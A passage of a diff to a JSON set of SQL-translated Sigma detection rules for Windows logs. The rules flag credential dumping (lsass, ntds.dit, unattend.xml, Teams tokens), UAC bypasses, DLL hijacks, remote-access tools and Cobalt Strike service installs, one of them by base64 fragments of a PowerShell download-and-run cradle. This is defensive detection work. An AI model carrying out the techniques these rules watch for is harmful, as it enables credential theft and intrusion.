"attack.credential_access", + "attack.t1003" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4657', '4656', '4663') AND (ObjectName LIKE 
'%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\microphone\\\\NonPackaged%' ESCAPE '\\' OR ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\webcam\\\\NonPackaged%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename REGEXP '\\\\Windows\\\\System32\\\\[a-zA-Z0-9]{8}\\.tmp$')" ], - "filename": "win_security_camera_microphone_access.yml" + "filename": "file_event_win_remote_cred_dump.yml" }, { - "title": "Suspicious Scheduled Task Creation", - "id": "3a734d25-df5c-4b99-8034-af1ddb5883a4", - "status": "experimental", - "description": "Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Scheduled Task Write to System32 Tasks", + "id": "80e1f67a-4596-4351-98f5-a9c3efabac95", + "status": "test", + "description": "Detects the creation of tasks from processes executed from suspicious locations", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", "attack.persistence", - "attack.t1053.005" + "attack.execution", + "attack.t1053" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4698' AND (TaskContent LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContent 
LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContent LIKE '%regsvr32%' ESCAPE '\\' OR TaskContent LIKE '%rundll32%' ESCAPE '\\' OR TaskContent LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContent LIKE '%cmd%' ESCAPE '\\' OR TaskContent LIKE '%/c %' ESCAPE '\\' OR TaskContent LIKE '%/k %' ESCAPE '\\' OR TaskContent LIKE '%/r %' ESCAPE '\\' OR TaskContent LIKE '%powershell%' ESCAPE '\\' OR TaskContent LIKE '%pwsh%' ESCAPE '\\' OR TaskContent LIKE '%mshta%' ESCAPE '\\' OR TaskContent LIKE '%wscript%' ESCAPE '\\' OR TaskContent LIKE '%cscript%' ESCAPE '\\' OR TaskContent LIKE '%certutil%' ESCAPE '\\' OR TaskContent LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContent LIKE '%bash.exe%' ESCAPE '\\' OR TaskContent LIKE '%bash %' ESCAPE '\\' OR TaskContent LIKE '%scrcons%' ESCAPE '\\' OR TaskContent LIKE '%wmic %' ESCAPE '\\' OR TaskContent LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContent LIKE '%forfiles%' ESCAPE '\\' OR TaskContent LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContent LIKE '%hh.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Windows\\\\System32\\\\Tasks%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\PerfLogs%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\config\\\\systemprofile%' ESCAPE '\\'))" ], - "filename": "win_security_susp_scheduled_task_creation.yml" + "filename": "file_event_win_susp_task_write.yml" }, { - "title": "Remote WMI ActiveScriptEventConsumers", - "id": "9599c180-e3a8-4743-8f92-7fb96d3be648", + "title": "Suspicious PROCEXP152.sys File Created In TMP", + "id": "3da70954-0f2c-4103-adff-b7440368f50e", "status": "test", - "description": "Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder.\nThis driver is used by 
Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.\n", + "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.003" + "attack.t1562.001", + "attack.defense_evasion" ], "falsepositives": [ - "SCCM" + "Other legimate tools using this driver and filename (like Sysinternals). Note - Clever attackers may easily bypass this detection by just renaming the driver filename. Therefore just Medium-level and don't rely on it." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4624' AND LogonType = '3' AND ProcessName LIKE '%scrcons.exe' ESCAPE '\\') AND NOT (TargetLogonId = '0x3e7'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%PROCEXP152.sys' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\procexp64.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procmon64.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procmon.exe%' ESCAPE '\\')))" ], - "filename": "win_security_scrcons_remote_wmi_scripteventconsumer.yml" + "filename": "file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml" }, { - "title": "Transferring Files with Credential Data via Network Shares", - "id": "910ab938-668b-401b-b08c-b596e80fdca5", + "title": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File", + "id": "d353dac0-1b41-46c2-820c-d7d2561fc6ed", "status": "test", - "description": "Transferring files with well-known filenames (sensitive files with credential data) using network shares", - "author": "Teymur Kheirkhabarov, oscd.community", + "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can 
be renamed)", + "author": "Julia Fomina, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.001", - "attack.t1003.003" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ - "Transferring sensitive files for legitimate administration work by legitimate administrator" + "Unlikely" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND (RelativeTargetName LIKE '%\\\\mimidrv%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\lsass%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\windows\\\\minidump\\\\%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\hiberfil%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\sqldmpr%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\sam%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\ntds.dit%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\security%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%WsmPty.xsl' ESCAPE '\\' OR TargetFilename LIKE '%WsmTxt.xsl' ESCAPE '\\') AND NOT ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_transf_files_with_cred_data_via_network_shares.yml" + "filename": "file_event_win_winrm_awl_bypass.yml" }, { - "title": "OilRig APT Schedule Task Persistence - Security", - "id": "c0580559-a6bd-4ef6-b9b7-83703d98b561", + "title": "PowerShell Profile Modification", + "id": "b5b78988-486d-4a80-b991-930eff3ff8bf", "status": "test", - "description": "Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", + "author": "HieuTT35, Nasreddine Bencherchali", "tags": [ 
"attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" + "attack.privilege_escalation", + "attack.t1546.013" ], "falsepositives": [ - "Unlikely" + "System administrator creating Powershell profile manually" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4698' AND TaskName IN ('SC Scheduled Scan', 'UpdatMachine'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft.PowerShell\\_profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WindowsPowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Program Files\\\\PowerShell\\\\7\\\\profile.ps1' ESCAPE '\\')" ], - "filename": "win_security_apt_oilrig_mar18.yml" + "filename": "file_event_win_susp_powershell_profile.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - Security", - "id": "1a0a2ff1-611b-4dac-8216-8a7b47c618a6", + "title": "Suspicious File Event With Teams Objects", + "id": "6902955a-01b7-432c-b32a-6f5f81d8f624", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "author": "@SerkinValery", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%(Clipboard|i%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 
'%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_via_use_clip_services_security.yml" + "filename": "file_event_win_access_susp_teams.yml" }, { - "title": "Replay Attack Detected", - "id": "5a44727c-3b85-4713-8c44-4401d5499629", - "status": "experimental", - "description": "Detects possible Kerberos Replay Attack on the domain controllers when \"KRB_AP_ERR_REPEAT\" Kerberos response is sent to the client", - "author": "frack113", + "title": "Advanced IP Scanner - File Event", + "id": "fed85bf9-e075-4280-9159-fbe8a023d6fa", + "status": "test", + "description": "Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.", + "author": "@ROxPinTeddy", + "tags": [ + "attack.discovery", + "attack.t1046" + ], "falsepositives": [ - "Unknown" + "Legitimate administrative use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4649')" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Advanced IP Scanner 2%' ESCAPE '\\'" ], - "filename": "win_security_replay_attack_detected.yml" + "filename": "file_event_win_advanced_ip_scanner.yml" }, { - "title": "Invoke-Obfuscation RUNDLL LAUNCHER - Security", - "id": "f241cf1b-3a6b-4e1a-b4f9-133c00dd95ca", - "status": "experimental", - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "title": "Suspicious Unattend.xml File Access", + "id": "1a3d42dd-3763-46b9-8025-b5f17f340dfb", + "status": "test", + "description": "Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored.\nIf these files exist, their contents will be displayed. 
They are used to store credentials/answers during the unattended windows install process\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1552.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%rundll32.exe%' ESCAPE '\\' AND ServiceFileName LIKE '%shell32.dll%' ESCAPE '\\' AND ServiceFileName LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\')" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\unattend.xml' ESCAPE '\\'" ], - "filename": "win_security_invoke_obfuscation_via_rundll_services_security.yml" + "filename": "file_event_win_access_susp_unattend_xml.yml" }, { - "title": "AD User Enumeration", - "id": "ab6bffca-beff-4baa-af11-6733f296d57a", + "title": "Suspicious Outlook Macro Created", + "id": "117d3d3a-755c-4a61-b23e-9171146d094c", "status": "test", - "description": "Detects access to a domain user from a non-machine account", - "author": "Maxime Thiebaut (@0xThiebaut)", + "description": "Detects the creation of a macro file for Outlook.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1087.002" + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" ], "falsepositives": [ - "Administrators configuring new users." 
+ "Unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\'))" + ], + "filename": "file_event_win_office_outlook_susp_macro_creation.yml" + }, + { + "title": "Created Files by Microsoft Sync Center", + "id": "409f8a98-4496-4aaa-818a-c931c0a8b832", + "status": "experimental", + "description": "This rule detects suspicious files created by Microsoft Sync Center (mobsync)", + "author": "elhoim", + "tags": [ + "attack.t1055", + "attack.t1218", + "attack.execution", + "attack.defense_evasion" + ], + "falsepositives": [ + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND ObjectType LIKE '%bf967aba-0de6-11d0-a285-00aa003049e2%' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\mobsync.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\'))" ], - "filename": "win_security_ad_user_enumeration.yml" + "filename": "file_event_win_susp_creation_by_mobsync.yml" }, { - "title": "CobaltStrike Service Installations - Security", - "id": "d7a95147-145f-4678-b85d-d1ff4a3bb3f6", + "title": "UAC Bypass Using Consent and Comctl32 - File", + "id": "62ed5b55-f991-406a-85d9-e8e8fdf18789", "status": "test", - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", - "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", + "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", + "attack.defense_evasion", "attack.privilege_escalation", - "attack.lateral_movement", - "attack.t1021.002", 
- "attack.t1543.003", - "attack.t1569.002" + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%ADMIN$%' ESCAPE '\\' AND ServiceFileName LIKE '%.exe%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%start%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\') OR ServiceFileName LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR (ServiceFileName LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ServiceFileName LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ServiceFileName LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.@%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" ], - "filename": "win_security_cobaltstrike_service_installs.yml" + "filename": "file_event_win_uac_bypass_consent_comctl32.yml" }, { - "title": "AD Privileged Users or Groups Reconnaissance", - "id": "35ba1d85-724d-42a3-889f-2e2362bcaf23", + "title": "Suspicious Binary Writes Via AnyDesk", + "id": "2d367498-5112-4ae5-a06a-96e7bc33a211", "status": "experimental", - "description": "Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs", - "author": "Samir Bousseaden", + "description": "Detects AnyDesk writing binary files to disk other than \"gcapi.dll\".\nAccording to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,\nwhich is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. 
(See reference section for more details)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1087.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "If source account name is not an admin then its super suspicious" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4661' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\')) AND ((ObjectName LIKE '%-512' ESCAPE '\\' OR ObjectName LIKE '%-502' ESCAPE '\\' OR ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-505' ESCAPE '\\' OR ObjectName LIKE '%-519' ESCAPE '\\' OR ObjectName LIKE '%-520' ESCAPE '\\' OR ObjectName LIKE '%-544' ESCAPE '\\' OR ObjectName LIKE '%-551' ESCAPE '\\' OR ObjectName LIKE '%-555' ESCAPE '\\') OR ObjectName LIKE '%admin%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\anydesk.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%\\\\gcapi.dll' ESCAPE '\\')))" ], - "filename": "win_security_account_discovery.yml" + "filename": "file_event_win_anydesk_writing_susp_binaries.yml" }, { - "title": "PowerShell Scripts Installed as Services - Security", - "id": "2a926e6a-4b81-4011-8a96-e36cc8c04302", + "title": "Anydesk Temporary Artefact", + "id": "0b9ad457-2554-44c1-82c2-d56a99c42377", "status": "test", - "description": "Detects powershell script installed as a Service", - "author": "oscd.community, Natalia Shornikova", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by 
application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%powershell%' ESCAPE '\\' OR ServiceFileName LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\AnyDesk\\\\user.conf%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\AnyDesk\\\\system.conf%' ESCAPE '\\') AND TargetFilename LIKE '%.temp' ESCAPE '\\')" ], - "filename": "win_security_powershell_script_installed_as_service.yml" + "filename": "file_event_win_anydesk_artefact.yml" }, { - "title": "Hidden Local User Creation", - "id": "7b449a5e-1db5-4dd0-a2dc-4e3a67282538", + "title": "Dumpert Process Dumper Default File", + "id": "93d94efc-d7ad-4161-ad7d-1638c4f908d8", "status": "test", - "description": "Detects the creation of a local hidden user account which should not happen for event ID 4720.", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1136.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND TargetUserName LIKE '%$' ESCAPE '\\')" + "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\dumpert.dmp' ESCAPE '\\'" ], - "filename": 
"win_security_hidden_user_creation.yml" + "filename": "file_event_win_hktl_dumpert.yml" }, { - "title": "Possible Impacket SecretDump Remote Activity", - "id": "252902e3-5830-4cf6-bf21-c22083dfd5cf", - "status": "experimental", - "description": "Detect AD credential dumping using impacket secretdump HKTL", - "author": "Samir Bousseaden, wagga", + "title": "Potential DCOM InternetExplorer.Application DLL Hijack", + "id": "2f7979ae-f82b-45af-ac1d-2b10e93b0baa", + "status": "test", + "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class over the network", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.003" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\ADMIN$' ESCAPE '\\' AND RelativeTargetName LIKE '%SYSTEM32\\\\%' ESCAPE '\\' AND RelativeTargetName LIKE '%.tmp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName = 'System' AND TargetFilename LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" ], - "filename": "win_security_impacket_secretdump.yml" + "filename": "file_event_win_dcom_iertutil_dll_hijack.yml" }, { - "title": "T1047 Wmiprvse Wbemcomn DLL Hijack", - "id": "f6c68d5f-e101-4b86-8c84-7d96851fd65c", + "title": "UAC Bypass Using IEInstal - File", + "id": "bdd8157d-8e85-4397-bb82-f06cc9c71dbb", "status": "test", - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network for a WMI DLL Hijack scenario.", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 
64)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\IEInstal.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%consent.exe' ESCAPE '\\')" ], - "filename": "win_security_wmiprvse_wbemcomn_dll_hijack.yml" + "filename": "file_event_win_uac_bypass_ieinstal.yml" }, { - "title": "Security Event Log Cleared", - "id": "a122ac13-daf8-4175-83a2-72c387be339d", - "status": "test", - "description": "Checks for event id 1102 which indicates the security event log was cleared.", - "author": "Saw Winn Naung", + "title": "SCR File Write Event", + "id": "c048f047-7e2a-4888-b302-55f509d4a91d", + "status": "experimental", + "description": "Detects the creation of screensaver files (.scr) outside of system folders. 
Attackers may execute an application as an \".SCR\" file using \"rundll32.exe desk.cpl,InstallScreenSaver\" for example.", + "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", "tags": [ - "attack.t1070.001" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Legitimate administrative activity" + "The installation of new screen savers by third party software" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '1102' AND Provider_Name = 'Microsoft-Windows-Eventlog')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%.scr' ESCAPE '\\' AND NOT ((TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\NewOS\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR TargetFilename LIKE ':\\\\WUDownloadCache\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_event_log_cleared.yml" + "filename": "file_event_win_new_src_file.yml" }, { - "title": "ISO Image Mount", - "id": "0248a7bc-8a9a-4cd8-a57e-3ae8e073a073", + "title": "ISO File Created Within Temp Folders", + "id": "2f9356ae-bf43-41b8-b858-4496d83b2acb", "status": "experimental", - "description": "Detects the mount of ISO images on an endpoint", - "author": "Syed Hasan (@syedhasan009)", + "description": "Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. 
Typical of Qakbot TTP from end-July 2022.", + "author": "@sam0x90", "tags": [ "attack.initial_access", "attack.t1566.001" ], "falsepositives": [ - "Software installation ISO files" + "Potential FP by sysadmin opening a zip file containing a legitimate ISO file" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4663' AND ObjectServer = 'Security' AND ObjectType = 'File' AND ObjectName LIKE '\\\\Device\\\\CdRom%' ESCAPE '\\') AND NOT (ObjectName LIKE '\\\\Device\\\\CdRom0\\\\setup.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.zip\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\Content.Outlook\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\'))" ], - "filename": "win_security_iso_mount.yml" + "filename": "file_event_win_iso_file_mount.yml" }, { - "title": "Enabled User Right in AD to Control User Objects", - "id": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", - "status": "test", - "description": "Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.", - "author": "@neu5ron", + "title": "Suspicious File Drop by Exchange", + "id": "6b269392-9eba-40b5-acb6-55c882b20ba6", + "status": "experimental", + "description": "Detects suspicious file type dropped by an Exchange component in IIS", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1098" + "attack.t1190", + "attack.initial_access", + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4704' AND PrivilegeList LIKE '%SeEnableDelegationPrivilege%' ESCAPE '\\')" + "SELECT * FROM logs WHERE 
